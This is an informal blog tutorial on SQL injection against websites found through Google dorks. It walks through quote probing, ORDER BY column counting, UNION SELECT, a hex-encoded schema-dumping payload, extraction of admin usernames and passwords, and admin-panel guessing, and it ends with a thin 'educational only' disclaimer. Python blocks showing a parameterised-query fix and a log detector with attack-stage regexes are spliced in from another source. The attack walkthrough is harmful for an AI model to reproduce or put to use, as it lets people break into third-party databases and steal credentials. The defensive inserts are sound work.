17 February 2015
Basics of SQL injection tutorial
Hello to all :D I am a noob here. I will show you how to hack any website using SQL injection.
What is SQL Injection?
SQL injection is one of the popular web application hacking methods. Using a SQL injection attack, an unauthorized person can access the database of the website. The attacker can extract data from the database.
What a hacker can do with SQL Injection attack?
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server
Step 1: Finding Vulnerable Website:
To find a site vulnerable to SQL injection, you can use Google search with certain keywords. Those keywords are often referred to as 'Google dorks'.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
etc. You can google for more dorks.
for eg:
www.site.com inurl:index.php?id=
Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and hit enter.
For eg:
http://www.site.com/index.php?id=2'
If the page stays the same or shows page not found, then it is not vulnerable.
If you get an error message like this, then it means that the site is vulnerable:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
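Why the quote produces that error, and what a fixed handler looks like, as an added example that is not from the original post. SQLite stands in for MySQL here, and the `articles` table and all function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; SQLite stands in for the MySQL backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?, ?)",
                   [(1, "First", "..."), (2, "Second", "...")])
    return db

def lookup_vulnerable(db, raw_id):
    # The id parameter is pasted into the SQL text, so a quote or extra
    # keywords change the statement itself. Database errors reach the caller.
    sql = "SELECT id, title, body FROM articles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Validate: an article id is a short run of ASCII digits, nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        return {"status": 400, "rows": []}
    # 2) Bind the value as a parameter; it can never become SQL syntax.
    try:
        rows = db.execute("SELECT id, title, body FROM articles WHERE id = ?",
                          (int(raw_id),)).fetchall()
    except sqlite3.Error:
        # 3) Never echo database error text back to the client.
        return {"status": 500, "rows": []}
    return {"status": 200 if rows else 404, "rows": rows}

def probe(db, raw_id):
    """Return (vulnerable_outcome, hardened_status) for one id value."""
    try:
        lookup_vulnerable(db, raw_id)
        vulnerable = "ok"
    except sqlite3.Error as exc:
        vulnerable = "sql error: " + str(exc)
    return vulnerable, lookup_hardened(db, raw_id)["status"]

if __name__ == "__main__":
    db = make_db()
    for value in ["2", "2'", "2 order by 3", "2 order by 4"]:
        print(repr(value), probe(db, value))
```

The hardened handler answers every malformed id with the same 400 response, so the error-versus-no-error difference that Steps 2 and 3 rely on is gone.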
Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database.
For that, replace the single quote (') with an "order by n" statement.
Change n from 1, 2, 3, 4, 5, 6, ... n until you get an error like "unknown column".
For eg:
http://www.site.com/index.php?id=2 order by 1
http://www.site.com/index.php?id=2 order by 2
http://www.site.com/index.php?id=2 order by 3
http://www.site.com/index.php?id=2 order by 4
If you get the error while trying the "x"th number, then the number of columns is "x-1".
I mean:
http://www.site.com/index.php?id=2 order by 1 (no error)
http://www.site.com/index.php?id=2 order by 2 (no error)
http://www.site.com/index.php?id=2 order by 3 (no error)
http://www.site.com/index.php?id=2 order by 4 (no error)
http://www.site.com/index.php?id=2 order by 5 (no error)
http://www.site.com/index.php?id=2 order by 6 (no error)
http://www.site.com/index.php?id=2 order by 7 (no error)
http://www.site.com/index.php?id=2 order by 8 (error)
So now x=8, and the number of columns is x-1, i.e. 7.
In case the above method fails to work for you, try adding "--" at the end of the statement.
For eg:
http://www.site.com/index.php?id=2 order by 1--
Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to x-1 (the number of columns), separated with commas (,).
For eg:
If the number of columns is 7, then the query is as follows:
http://www.site.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.site.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Bingo, columns '1', 2, 3 and '4' are found to be vulnerable. Let us take the first vulnerable column '3'. We can inject our query in this column.
Step 5: Finding the table name as well as the column :D
Use this query to find the DATABASE, TABLES and COLUMN at a time:
www.site.com/index.php?id=-2 UNION SELECT
1,2,concat(0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select
(@x) from (select (@x:=0x00),(select (0) from
(information_schema.columns) where
(table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in
(@x:=concat(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),4,5,6,7--
result will be like this
Now replace the whole query with "group_concat(column1,0x3a,column2)" and add "from table_name".
For eg:
http://www.site.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from admin--
If the above query displays the 'column is not found' error, then try another column name from the list.
If we are lucky, it will display the data stored in the database, depending on your column name. For instance, the username and password columns will display the login credentials stored in the database.
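The requests from Steps 2 to 5 leave a recognisable trail in web server logs. The following added example (not from the original post) scans access-log lines for those stages and flags a client that hits several of them; the log lines are constructed, and the rule names and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [17/Feb/2015:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Feb/2015:10:00:05 +0000] "GET /index.php?id=2%27 HTTP/1.1" 500 310
203.0.113.9 - - [17/Feb/2015:10:00:09 +0000] "GET /index.php?id=2%20order%20by%201 HTTP/1.1" 200 5120
203.0.113.9 - - [17/Feb/2015:10:00:10 +0000] "GET /index.php?id=2+order+by+8-- HTTP/1.1" 500 310
203.0.113.9 - - [17/Feb/2015:10:00:14 +0000] "GET /index.php?id=-2+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+admin-- HTTP/1.1" 200 4800
198.51.100.7 - - [17/Feb/2015:10:00:30 +0000] "GET /gallery.php?id=14 HTTP/1.1" 200 7000
"""

# One rule per stage of the tutorial, applied to the URL-decoded query string.
RULES = [
    ("quote_probe",   re.compile(r"=[^&]*'")),                         # Step 2
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),        # Step 3
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # Step 4
    ("schema_read",   re.compile(r"\binformation_schema\b|\bgroup_concat\s*\(", re.I)),  # Step 5
]
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan(log_text):
    """Map each client IP to the set of stages seen in its requests."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target, _status = m.groups()
        query = unquote_plus(target.partition("?")[2])  # decode %27, %20, '+'
        for name, rx in RULES:
            if rx.search(query):
                hits[ip].add(name)
    return hits

def alerts(log_text, min_stages=2):
    # A lone quote can be legitimate input (a surname, for example), so alert
    # only when one client shows at least min_stages distinct stages.
    return {ip: sorted(s) for ip, s in scan(log_text).items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, stages in alerts(SAMPLE_LOG).items():
        print(ip, stages)
```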
Step 8: Finding the Admin Panel:
Just try with URLs like:
http://www.site.com/admin.php
http://www.site.com/admin/
http://www.site.com/admin.html
http://www.site.com:2082/
etc.
If you are lucky, you will find the admin page using the above URLs, or you can use some kind of admin finder tool.
Warning:
The above post is completely for educational purposes only. Never attempt to follow the above steps against third-party websites.
:D enjoy hacking